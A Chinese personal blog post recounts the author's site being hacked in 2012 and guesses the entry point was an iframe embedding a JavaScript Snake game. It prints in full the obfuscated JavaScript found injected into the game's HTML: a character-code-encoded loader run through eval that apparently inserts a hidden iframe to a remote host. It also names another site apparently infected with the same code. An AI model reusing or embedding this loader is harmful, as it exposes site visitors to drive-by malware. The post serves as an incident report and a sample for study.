吉吉于

free

恭喜网站第二次被黑!

公元2012年5月23日上午11点,Lazynight被某些hacker给黑掉,终于,啊,继2012.5.11再一次被攻击。

起初我怀疑是Typecho程序本身有漏洞,这个博客程序自2010年8月份便停止了更新。

于是我又折腾到Wordpress,本来想折腾Drupal,后来网速那个慢···就直接滚回Wordpress了。

中间把数据库从TE转到WP,又从WP转到TE,来来回回折腾了几次,shit,浪费了一下午。

计划全泡汤!!

好吧,就当了一次上传下载工…

但是!

下午5点收拾残局的时候发现了别人是怎么攻击的…(这里只是自己猜测的)

应该是通过iframe漏洞注入js恶意代码

好吧,前天晚上我发表了一篇日志:JS版贪吃蛇,并在那篇文章里插入了iframe代码,能使游戏可以在文章里运行。

今天打开贪吃蛇源文件,发现那行js恶意代码就在html文件里…

于是就有了以上的猜想。

try{q=document.createElement(“u”);q.appendChild(q+””);}catch(qw){h=-012/5;zz=’a’+’l’;f=’fr’+’o’+’m’+’Ch’;f+=’arC’;}try{qwe=prototype;}catch(brebr){zz=’zv’.substr(123-122)+zz;ss=[];f+=(h)?’ode’:”“;w=this;e=w[f.substr(11)+zz];n=”1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$57$57.5$46.5$55.5$50$53.5$51.5$20$52$54.5$21$22$20$46$49.5$58$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$57$57.5$46.5$55.5$50$53.5$51.5$20$52$54.5$21$22$20$46$49.5$58$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5″[((e)?”s”:””)+”p”+”lit”](“a$”.substr(1));for(i=6-2-1-2-1;i-585!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}

这就是那串代码,想折腾的可以研究一下。

另外,我发现还有其他好几个网站也被注入了以上代码:

http://www.csir-iir.org/

可以看他的源代码,顶部的js和这段恶意代码一样···

 

总结:别用iframe了啊亲…

或者你有什么好的方法来预防可以分享一下,感激不尽。

最后:让Hacker的攻击来的更猛烈些吧!

 

转载请注明:于哲的博客 » 恭喜网站第二次被黑!